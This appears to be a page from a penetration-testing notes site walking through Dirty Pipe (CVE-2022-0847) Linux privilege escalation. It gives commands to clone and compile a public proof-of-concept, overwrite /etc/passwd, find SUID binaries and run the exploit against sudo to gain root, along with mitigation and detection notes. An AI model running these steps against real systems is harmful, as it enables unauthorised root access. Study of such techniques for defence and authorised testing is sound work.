search
LinkedInGithub
githubEdit

dirty-pipe

Kernel version from 5.8 to 5.17 affected

hashtag
METHOD: 1

uname -r

hashtag
METHOD: 2

Find SUID binaries

find / -perm -4000 2>/dev/null
./exploit-2 /usr/bin/sudo

hashtag
Clone exploit

git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits

hashtag
Compile exploit

bash compile.sh

hashtag
Verify kernel version

hashtag
Exploit 1 (modify /etc/passwd)

hashtag
Verify root access

hashtag
Find SUID binaries

hashtag
Exploit 2 (run SUID binary)

hashtag
Verify root access

Key Concepts:

  • Dirty Pipe (CVE-2022-0847):

    • Linux kernel vulnerability.

    • Allows writing to arbitrary files with read access.

    • Affects kernel versions 5.8 to 5.17.

    • Similar to Dirty Cow (CVE-2016-5195).

  • Pipes:

    • Unidirectional communication mechanism between processes.

  • SUID Binaries:

    • Binaries that run with the privileges of their owner.

Vulnerability and Exploitation:

  • Vulnerability Details:

    • The vulnerability involves improper handling of pipe buffers.

    • It allows bypassing file permission checks.

  • Exploitation Process:

    • Download a Proof-of-Concept (PoC) exploit.

    • Compile the exploit.

    • Run the exploit.

    • Exploit-1: Modifies /etc/passwd to gain root access.

    • Exploit-2: Runs SUID binaries as root.

  • Mitigation:

    • Update the Linux kernel to a patched version.

Exploitation Steps (as described):

  1. Download PoC Exploit:

    • git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

    • cd CVE-2022-0847-DirtyPipe-Exploits

    • bash compile.sh

  2. Verify Kernel Version:

    • uname -r

  3. Exploit 1 (Modify /etc/passwd):

    • ./exploit-1

    • id

  4. Find SUID Binaries:

    • find / -perm -4000 2>/dev/null

  5. Exploit 2 (Run SUID Binary):

    • ./exploit-2 /path/to/suid/binary

    • id

Important Considerations and Enhancements:

  • Vulnerability Severity:

    • Dirty Pipe is a critical vulnerability.

    • It allows easy privilege escalation.

  • Patching:

    • Updating the kernel is essential.

  • Exploit Reliability:

    • The PoC exploit is generally reliable.

  • Android Impact:

    • Highlight the impact on Android devices.

  • Detection:

    • Monitor for unexpected file modifications.

    • Use intrusion detection systems.

  • Real world examples: Researching real world dirty pipe exploits will help solidify understanding of the attack vectors.

  • File restoration: Emphasize the importance of the exploit restoring the /etc/passwd file.

  • Specific kernel versions: It is very important to make sure the exploit being used is compatible with the kernel version of the target.

Previouscron-job-abuseNextdocker

Last updated